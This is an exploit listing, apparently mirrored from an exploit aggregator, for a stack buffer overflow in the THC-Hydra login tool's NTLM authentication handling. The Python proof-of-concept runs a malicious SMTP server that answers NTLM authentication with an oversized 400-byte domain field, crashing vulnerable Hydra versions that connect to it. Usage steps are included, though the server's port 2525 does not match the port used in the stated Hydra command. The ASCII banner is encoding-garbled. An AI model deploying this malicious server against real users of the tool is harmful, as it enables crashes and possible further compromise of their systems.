Share
## https://sploitus.com/exploit?id=PACKETSTORM:225282
# Exploit Title:    Hydra - Stack Buffer Overflow 
    # CVE:                   CVE-2026-56766
    # Date:                  2026-06-26
    # Exploit Author:        Mohammed Idrees Banyamer
    # Author Country:        Jordan
    # Instagram:             @banyamer_security
    # Author GitHub:         https://github.com/mbanyamer
    # Author Blog  :         https://banyamersecurity.com/blog/
    # Vendor Homepage:       https://github.com/vanhauser-thc/thc-hydra
    # Software Link:         https://github.com/vanhauser-thc/thc-hydra
    # Affected:              Hydra <= 9.7
    # Tested on:             Hydra 9.5 (Ubuntu 22.04)
    # Category:              Remote
    # Platform:              Linux
    # Exploit Type:          Stack Buffer Overflow
    # CVSS:                  7.5
    # Description:           Malicious NTLM Type-2 challenge with excessively long domain
    #                        causes stack buffer overflow in Hydra's NTLM authentication handler
    #                        (SMTP, POP3, IMAP, etc. modules).
    # Fixed in:              https://github.com/vanhauser-thc/thc-hydra/commit/9cc84c20e75f5fef6bb1790bb9ada2afad2204e2
    # Usage:
    #   python3 exploit.py
    #
    # Examples:
    #   python3 exploit.py
    #
    # Notes:
    #   โ€ข Run this PoC server first, then launch vulnerable Hydra against it.
    #   โ€ข Triggers SIGSEGV in vulnerable versions.
    #
    # How to Use
    #
    # Step 1: Run the exploit server: python3 exploit.py
    # Step 2: Run Hydra: hydra -l test -p test 127.0.0.1 smtp
    
    def banner():
        print(r"""
    โ•”โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ•—
    โ•‘โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ•‘โ•šโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•‘
    โ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•‘ โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ• โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ–ˆโ–ˆโ–ˆโ–ˆโ•”โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•
    โ•‘โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘โ•šโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘  โ•šโ–ˆโ–ˆโ•”โ•  โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘โ•šโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ•  โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—
    โ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ•šโ•โ• โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘
    โ•šโ•โ•โ•โ•โ•โ• โ•šโ•โ•  โ•šโ•โ•โ•šโ•โ•  โ•šโ•โ•โ•โ•   โ•šโ•โ•   โ•šโ•โ•  โ•šโ•โ•โ•šโ•โ•     โ•šโ•โ•โ•šโ•โ•โ•โ•โ•โ•โ•โ•šโ•โ•  โ•šโ•โ•
            โ•”โ•โ•— Banyamer Security โ•”โ•โ•—
    """)
    
    import socket
    import base64
    import struct
    import threading
    import time
    import sys
    
    NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
    NTLM_TYPE_2 = 2
    
    def create_ntlm_type2_challenge():
        challenge = bytearray(NTLMSSP_SIGNATURE)
        challenge += struct.pack("<I", NTLM_TYPE_2)
        
        domain_name = b"A" * 400
        domain_len = len(domain_name)
        
        flags = 0x00008201
        server_challenge = b"\x11\x22\x33\x44\x55\x66\x77\x88"
        reserved = b"\x00" * 8
        target_name_offset = 48
        
        challenge += struct.pack("<HHI", domain_len, domain_len, target_name_offset)
        challenge += struct.pack("<I", flags)
        challenge += server_challenge
        challenge += reserved
        challenge += b"\x00" * 8
        challenge += domain_name
        
        return challenge
    
    class SMTPServer:
        def __init__(self, host='0.0.0.0', port=2525):
            self.host = host
            self.port = port
            self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            
        def handle_client(self, client, addr):
            client.send(b"220 poc-smtp-server ESMTP Ready\r\n")
            
            while True:
                try:
                    data = client.recv(4096).decode('utf-8', errors='ignore').strip()
                    if not data:
                        break
                        
                    if data.upper().startswith("EHLO") or data.upper().startswith("HELO"):
                        client.send(b"250-OK\r\n250 AUTH NTLM\r\n")
                    
                    elif data.upper().startswith("AUTH NTLM"):
                        client.send(b"334 NTLM\r\n")
                        
                    elif len(data) > 10:
                        type2 = create_ntlm_type2_challenge()
                        b64_type2 = base64.b64encode(type2).decode('ascii')
                        client.send(f"334 {b64_type2}\r\n".encode())
                        
                        time.sleep(1)
                        client.recv(8192)
                        client.send(b"235 Authentication successful (fake)\r\n")
                        break
                    
                    elif data.upper().startswith("QUIT"):
                        client.send(b"221 Bye\r\n")
                        break
                    
                except:
                    break
            
            client.close()
        
        def start(self):
            self.sock.bind((self.host, self.port))
            self.sock.listen(5)
            print(f"[+] Malicious SMTP server listening on {self.host}:{self.port}")
            print("[+] Run: hydra -l test -p test 127.0.0.1 smtp")
            
            while True:
                client, addr = self.sock.accept()
                threading.Thread(target=self.handle_client, args=(client, addr), daemon=True).start()
    
    if __name__ == "__main__":
        banner()
        try:
            server = SMTPServer()
            server.start()
        except KeyboardInterrupt:
            print("\n[+] Server stopped")
        except Exception as e:
            print(f"[-] Error: {e}")